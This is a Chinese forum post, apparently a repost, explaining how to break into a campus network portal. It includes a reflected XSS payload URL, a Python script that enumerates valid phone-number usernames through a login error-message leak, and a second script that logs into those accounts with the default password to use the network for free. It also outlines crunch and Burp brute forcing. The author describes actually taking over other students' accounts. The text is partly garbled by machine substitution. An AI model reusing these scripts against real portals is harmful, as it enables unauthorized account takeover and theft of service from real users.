ToB企服应用市场:ToB评测及商务社交产业平台

标题: 如何破校园网 [打印本页]

作者: 曹旭辉    时间: 2024-9-15 13:40
标题: 如何破校园网
下面会介绍两种破解方法
下面介绍的方法是用于账号和暗码知道二者其一才行,假如二者都不知道,那就你费些时间了,这我就不多说了,懂得都懂…
我先说一下破解思绪:
其实很简单,无非就是跑字典,我们第一步就是要先天生字典,第二步去进行测试,就是类似于正凡人登录一样,只不过我这是用脚本跑的,更快。
目次
利用python脚本破解
利用kali中的burp进行破解

利用python脚本破解

简介

前端做的不是很好,前端UI结构写的较差,后端接口也不太严谨,能够透露出些信息轻易被利用,在找弊端的过程中发现一个反射型的xss,用处不是很大究竟要受害者点击才华执行恶意代码,我找到的这些东西和思绪都总结在下面。
反射型XSS

![](https://img-
blog.csdnimg.cn/img_convert/089920a8b711af789dcc70a14446b034.png)
  1. http://10.100.10.100:801/eportal/portal/mac/unbind?callback=<script>alert("xss");</script>
复制代码
一个危害不大的反射型XSS,下面就是文章的主题,如何蹭网!
认证网址

http://10.100.10.100  // 用户认证
http://10.100.10.3:8080/Self/login  // 用户后台登录
http://10.100.10.100:9002  //注销登录
http://10.100.10.100:801  // 主后台管理
分析认证

![](https://img-
blog.csdnimg.cn/img_convert/984efbdb5073a9b963ffc79b3917a3f5.png)
蹭网原理

蹭网的方法有许多,比力流行的是基于端口(可以自行百度),还有就是通过改主机MAC地点(已经上线了的主机MAC,把自己MAC的改成他的,那么两个能够同时上网,在这里会有一点小瑕疵,流量一下你这一下他那,总的来说是可以上网的)。
![](https://img-
blog.csdnimg.cn/img_convert/721153ae970b0b717c565a28059c5728.png)
可以发现我随便输入一个不存在的账号加一个错误的暗码,登录返回的信息居然是账号不存在?
不得了,通过上面的信息完全就可以跑手机号,一想到联通手机号开头是 130、131、132、155、156、185、186、145、176。
背面的数可以进行程序进行猜,一样寻常来说安全意识不强的人不会拿到账号去更改暗码的。
以是轻易留下弱口令,校园网给的暗码是6个6 或 1~6 只要拿到账号那岂不是就能登上去了?废话不多说开始写代码。。。
  
  1. import requests
  2. import re
  3. import itertools
  4. import multiprocessing
  5. import os
  6. url = "http://10.100.10.100/drcom/login"     
  7. headers = {
  8.     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
复制代码
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36’
}
  1. def checkUserId(userId):
  2.     params = {
  3.         "callback": "dr1003",
  4.         "DDDDD": f"{userId}@unicom",
  5.         "upass": "1",
  6.         "0MKKey": "000",
  7.         "R1": "0",
  8.         "R2": "",
  9.         "R3": "0",
  10.         "R6": "0",
  11.         "para": "00",
  12.         "v6ip": "",
  13.         "terminal_type": "1",
  14.         "lang": "zh-cn",
  15.         "jsVersion": "4.2",
  16.         "v": "6687",
  17.         "lang": "zh"
  18.     }
  19.     try:
  20.         res = requests.get(url, params=params, headers=headers).text
  21.         data = re.findall(r'"msga":"(.*?)"', res)
  22.         if data[0] != "userid error1":
  23.             with open(fr"{os.getcwd()}\userId.txt", "a") as f:
  24.                 f.writelines(userId + "\n")
  25.             print(userId, "√")
  26.         else:
  27.             print(userId, "x")
  28.     except Exception as e:
  29.         print(f"Error for user ID {userId}: {e}")
  30.         return e
  31. if __name__ == '__main__':
  32.     results = []
  33.     prefix_list = ["1767399"]  # Create numbers list        #“1767399”
复制代码
可以随便改
num_processes = 2 # Create 2 multiprocesses
  1.     pool = multiprocessing.Pool(num_processes)
  2.     for suffix in itertools.product(range(0, 10), repeat=4):
  3.         suffix_str = ''.join(map(str, suffix))
  4.         for prefix in prefix_list:
  5.             user_id = f"{prefix}{suffix_str}"
  6.             result = pool.apply_async(checkUserId, args=(user_id,))
  7.             results.append(result)
  8.     # Wait for all processes to finish
  9.     pool.close()
  10.     pool.join()
  11.     # Print any exceptions that occurred during execution
  12.     for result in results:
  13.         if result.get() is not None:
  14.             print(result.get())
复制代码
代码运行

这里我只写了Python3的脚本,就不消其他语言了,做这种事照旧Python用的方便些。
![](https://img-
blog.csdnimg.cn/img_convert/ba2c5fba74bd9203b8926240f4f9ec74.png)
运行结果

![](https://img-
blog.csdnimg.cn/img_convert/56ad6b127c8b2aaa6472165df4224532.png)
我运行一半就不跑了究竟不是来搞粉碎的,先看看生存的手机号有610多个手机号,效果还可以。
![](https://img-
blog.csdnimg.cn/img_convert/18ea3ae64b3199e48ed0efe50123f3a2.png)
随便拿个账号试试 暗码6个6 和我想得一样 登录乐成!!
![](https://img-
blog.csdnimg.cn/img_convert/03e46827ab114d26c467c22e0cde158b.png)
其他的账号都是一样,可以发现他现,在上网就不打搅他了。
安全总结

1.前端的错误提示不要给的太明显,可以写成这样 “账号或者暗码错误”。
2.对账号暗码的加密,虽然可以通过JS逆向出来但也可以增长安全性。
3.对前端错误次数做限制再加上验证码,虽然可以破解但也可以增长安全性。
4.当你拿到账号时登录后请先修改强暗码,防止弱口令登录。
危害总结

1.登录后别人可以利用您的网络 可以等你下线再利用或者直接利用你的账号上网。
2.可以对你进行断网利用,危害校园网较大影响网络体验导致投诉。
3.可以修改你的暗码,由于后台更改暗码必要身份证,但并没有完善。
4.账号并没有绑定身份证,导致只能去办理校园网那边更改较贫苦。
修改暗码

可以发现假如暗码被改了,自己是无法从表面修改自己的暗码的只能去办理校园网那边进行修改。
![](https://img-
blog.csdnimg.cn/img_convert/28d38a2b2f111fd0cd2682c8685d61cd.png)
修改暗码
修改无效
![](https://img-
blog.csdnimg.cn/img_convert/b4204da388f4bddbe58cb42f6d12bae3.png)
Wifi共享思绪

既然都有账号暗码,那我岂不是可以免费上网了,由于最后一个学期了就没办校园卡,
于是写了个遍历判定假如在上网的用户就不打搅了,只连不在上网的用户这样就好了。
  
  1. import requests
  2. import re
  3. url = "http://10.100.10.100/drcom/login"
  4. with open("userId.txt", "r") as f:
  5.     for line in f.readlines():
  6.         user_id = line.strip()
  7.         params = {
  8.             "callback": "dr1003",
  9.             "DDDDD": f"{user_id}@unicom",
  10.             "upass": "666666",
  11.             "0MKKey": "123456",
  12.             "R1": "0",
  13.             "R2": "",
  14.             "R3": "0",
  15.             "R6": "0",
  16.             "para": "00",
  17.             "v6ip": "",
  18.             "terminal_type": "1",
  19.             "lang": "zh-cn",
  20.             "jsVersion": "4.2",
  21.             "v": "6687",
  22.             "lang": "zh"
  23.         }
  24.         res = requests.get(url, params=params)
  25.         cont = re.findall(r'{"result":(.*?),', res.text)
  26.         print(cont)
  27.         if cont and cont[0] == "1":
  28.             print(f"{user_id}, 登录成功~")
  29.             break
复制代码
这样就可以破解校园网了,下面介绍另一种方法。
利用kali中的burp进行破解

kali想必大家都知道吧,里面的工具burp我就不跟大家过多叙述了,下面直接进入主题(我这里是知道暗码,不知账号得环境,假如你们的是知道账号,不知暗码也可以用以下方法)
起首我们先天生字典

这里的crunch是kali上的一个工具,-t表示%是数字,前面两个11分别表示的是天生的数字最短是11位,最长也是11位,>>是将天生的字典生存在tjy.txt中。
天生字典的方法还有许多,当平台不让发,以是你们去网上找找啦
然后我们对校园网站进行抓包,如下




开始破解了
看响应码和长度,有不同的话进去看响应包
以上就是klai利用burp破解的过程
希望大家喜欢!!!
网络安全工程师(白帽子)企业级学习路线

第一阶段:安全根本(入门)


第二阶段:Web渗透(初级网安工程师)


第三阶段:进阶部门(中级网络安全工程师)


假如你对网络安全入门感爱好,那么你必要的话可以点击这里




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4